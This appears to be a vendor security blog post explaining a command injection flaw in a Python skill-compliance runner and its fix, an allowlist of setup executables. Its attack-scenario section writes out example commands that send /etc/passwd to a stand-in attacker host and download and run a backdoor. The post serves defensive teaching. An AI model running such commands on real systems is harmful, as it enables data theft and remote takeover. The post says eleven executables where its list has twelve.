How Command Injection Happens in Python subprocess and How to Fix It
Summary
A command injection vulnerability in skills/skill-comply/scripts/runner.py allowed attackers who could influence skill definition files to execute arbitrary binaries on the host system via subprocess.run(). The fix introduces an explicit allowlist of permitted executables (ALLOWED_SETUP_EXECUTABLES) that gates every command before it reaches the subprocess call at line 110. This closes a significant attack surface in the skill-comply pipeline without breaking legitimate setup workflows.
Quick answer: This is a command injection vulnerability (CWE-78) in Python's
subprocess.run()call insideskills/skill-comply/scripts/runner.py. Because thepartsarray fed tosubprocess.run()was derived directly from user-controlled skill definitions without validation, an attacker could craft a malicious skill definition to execute any binary available on the system. The fix adds a frozen-set allowlist (ALLOWED_SETUP_EXECUTABLES) that rejects any executable not explicitly approved — if the first token of a parsed command isn't in the allowlist, the command is silently skipped before reachingsubprocess.run().
Introduction
The _setup_sandbox() function in skills/skill-comply/scripts/runner.py is responsible for preparing an isolated working directory before a skill compliance scenario runs. It reads setup commands from scenario definitions and executes them to provision the sandbox — installing dependencies, creating files, cloning repositories. This is exactly the kind of automation you'd expect in a CI-adjacent tool.
But there was a flaw: every command parsed from the scenario definition was passed directly to subprocess.run() with no check on which executable was being invoked. An attacker who could influence a skill definition file could slip in a command like curl http://attacker.example/exfil?data=$(cat /etc/passwd) or simply execute any binary present on the host. The array form of subprocess.run() was correctly used — avoiding shell metacharacter interpretation — but that protection only goes so far when the executable name itself is attacker-controlled.
The Vulnerability Explained
The Vulnerable Code
Here is the relevant section of _setup_sandbox() before the fix, centered on line 110:
def _setup_sandbox(sandbox_dir: Path, scenario: Scenario) -> None:
for cmd in scenario.setup_commands:
parts = cmd.split()
if not parts or parts[0] in SHELL_BUILTINS:
# Shell builtins (cd/pushd/popd) cannot run as subprocess; skip.
continue
try:
subprocess.run(parts, cwd=sandbox_dir, capture_output=True) # line 110
except FileNotFoundError:
...
The logic correctly skips shell builtins like cd, pushd, and popd — those can't be invoked as subprocesses anyway. But after that single guard, any executable name that appears as the first token of a setup command is handed to the OS for execution.
What parts Actually Is
parts is produced by splitting a raw string from scenario.setup_commands — a list that comes from parsed skill definition files. If those files are authored or modified by a user (or an attacker with write access to the skill definitions), they control the content of parts[0].
Even without shell=True, subprocess.run(["curl", "http://attacker.example/..."]) is perfectly valid Python and will happily invoke curl if it exists on the system. The sandbox directory (cwd=sandbox_dir) provides filesystem isolation, but it does not restrict which binaries can be executed.
A Concrete Attack Scenario
Imagine a CI pipeline that pulls skill definitions from a repository and runs the skill-comply checker. An attacker with write access to that repository (or who can submit a PR that gets merged) adds the following to a scenario's setup_commands:
setup_commands:
- "curl http://attacker.example/exfil?d=$(cat /etc/passwd | base64)"
- "wget -O /tmp/backdoor http://attacker.example/payload && chmod +x /tmp/backdoor && /tmp/backdoor"
When _setup_sandbox() processes this scenario, parts becomes ["curl", "http://attacker.example/exfil?d=..."] — which passes the shell-builtin check — and subprocess.run() executes it. The sandbox directory context doesn't help here; the command runs with the full privileges of the process, and curl or wget happily communicates with the attacker's server.
Why Array Form Isn't Enough
A common misconception is that using the array form of subprocess.run() (rather than a shell string like subprocess.run("curl ...", shell=True)) fully prevents command injection. It does prevent shell metacharacter injection — semicolons, pipes, backticks, and the like won't be interpreted. But it does nothing to restrict which program gets executed. The executable name is just another string, and if it comes from untrusted input, the array form provides no protection at all.
The Fix
The Allowlist Approach
The fix adds a frozenset of explicitly approved executables at module level:
ALLOWED_SETUP_EXECUTABLES = frozenset({
"git", "npm", "pip", "pip3",
"touch", "mkdir", "cp", "mv", "echo",
"chmod", "unzip", "tar",
})
And then adds a single guard in _setup_sandbox() immediately after the shell-builtin check:
if parts[0] not in ALLOWED_SETUP_EXECUTABLES:
# Restrict to known-safe executables to prevent arbitrary code execution.
continue
Before vs. After
Before (vulnerable):
if not parts or parts[0] in SHELL_BUILTINS:
continue
try:
subprocess.run(parts, cwd=sandbox_dir, capture_output=True)
except FileNotFoundError:
...
After (fixed):
if not parts or parts[0] in SHELL_BUILTINS:
continue
if parts[0] not in ALLOWED_SETUP_EXECUTABLES:
# Restrict to known-safe executables to prevent arbitrary code execution.
continue
try:
subprocess.run(parts, cwd=sandbox_dir, capture_output=True)
except FileNotFoundError:
...
Why This Works
The allowlist is a frozenset — immutable at runtime, with O(1) lookup. Every command parsed from a scenario definition must now have its executable name appear in ALLOWED_SETUP_EXECUTABLES before it reaches subprocess.run(). The approved set covers the legitimate use cases for sandbox setup: cloning repositories (git), installing dependencies (npm, pip, pip3), manipulating files (touch, mkdir, cp, mv, chmod), and unpacking archives (unzip, tar).
Anything else — curl, wget, python, /bin/sh, a full path like /usr/local/bin/malware — is silently skipped. The continue statement means no error is raised; the sandbox setup just moves on to the next command. This is a deliberate design choice: failing loudly might allow an attacker to probe which executables are permitted by observing error output.
The Regression Test
The PR also adds tests/test_invariant_runner.py, which directly imports and calls _setup_sandbox() with crafted malicious scenario inputs. The test verifies that no marker files are created outside the sandbox and that sensitive file content doesn't leak into output — a concrete, repeatable invariant that guards against future regressions.
Prevention & Best Practices
1. Always Validate Executable Names Before subprocess.run()
Whenever subprocess.run() (or subprocess.Popen(), os.execv(), etc.) receives a command derived from external input, validate parts[0] against an explicit allowlist of known-safe executables. Do this before any other processing.
2. Use frozenset for Allowlists
A frozenset is the right data structure here: it's immutable (can't be accidentally modified at runtime), has O(1) membership testing, and makes the intent explicit. Avoid using a plain list for allowlists — the O(n) lookup is a minor concern, but the mutability is a real one.
3. Never Conflate Array Form with Safety
Using subprocess.run(parts, shell=False) prevents shell injection but does not prevent arbitrary executable invocation. Both protections are necessary when input is untrusted.
4. Apply Principle of Least Privilege to Subprocess Calls
Ask: what is the minimum set of executables this code legitimately needs to invoke? Encode that set explicitly. If you find yourself wanting to add python or bash to the allowlist, that's a signal to reconsider the design.
5. Run Static Analysis
- Bandit (
bandit -r .) flags subprocess calls with potentially untrusted input under ruleB603/B604. - Semgrep has rules for subprocess injection patterns at semgrep.dev/r?q=subprocess.
- This vulnerability was caught by the
multi_agent_aiscanner ruleV-001— demonstrating that AI-assisted scanning can catch patterns that traditional regex-based tools might miss.
6. Reference: OWASP & CWE
- CWE-78: Improper Neutralization of Special Elements used in an OS Command
- OWASP Command Injection: OWASP OS Command Injection Defense Cheat Sheet
Key Takeaways
- Array form of
subprocess.run()is not sufficient protection whenparts[0]— the executable name — is derived from user-controlled input. An allowlist of permitted executables is also required. ALLOWED_SETUP_EXECUTABLESinrunner.pydefines the security boundary for sandbox setup commands. Any future addition to this set should be reviewed as a security-relevant change.- Skill definition files are a trust boundary. Any code that parses and executes content from skill definitions must treat that content as potentially adversarial, even in internal tooling.
frozensetis the right tool for runtime allowlists in Python — immutable, fast, and semantically clear about intent.- Regression tests should test security invariants, not just functionality. The new
test_invariant_runner.pydirectly tests the property "adversarial inputs must not result in arbitrary command execution" — a pattern worth adopting broadly.
How Orbis AppSec Detected This
- Source: Skill definition files (
scenario.setup_commands) parsed from the repository filesystem or external input, with no sanitization of executable names. - Sink:
subprocess.run(parts, cwd=sandbox_dir, capture_output=True)atskills/skill-comply/scripts/runner.py:110, whereparts[0]is the attacker-controlled executable name. - Missing control: No allowlist or denylist validation of
parts[0]before the subprocess call. The only existing guard checked for shell builtins (which can't be invoked as subprocesses anyway), leaving all other executables unrestricted. - CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- Fix: Added
ALLOWED_SETUP_EXECUTABLESfrozenset and a pre-execution check that skips any command whose executable is not in the approved set.
Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.
Conclusion
The vulnerability in runner.py is a clear illustration of why input validation must happen at every trust boundary — not just at HTTP endpoints or user-facing APIs, but also in internal automation scripts that process configuration files and skill definitions. The fix is elegantly simple: a frozenset of eleven approved executables and three lines of guard code. But the lesson is broader.
When you write code that calls subprocess.run(), ask yourself: where does parts[0] come from? If the answer is "parsed from a file" or "derived from user input," you need an allowlist. Array form is not enough. Sandbox directories are not enough. The only reliable protection is an explicit, minimal set of executables that your code is permitted to invoke — everything else should be rejected before it reaches the OS.
Security in automation tooling is easy to overlook precisely because it feels like internal infrastructure. But as this case shows, the skill-comply pipeline processes content that could be influenced by contributors, and that makes it an attack surface worth defending.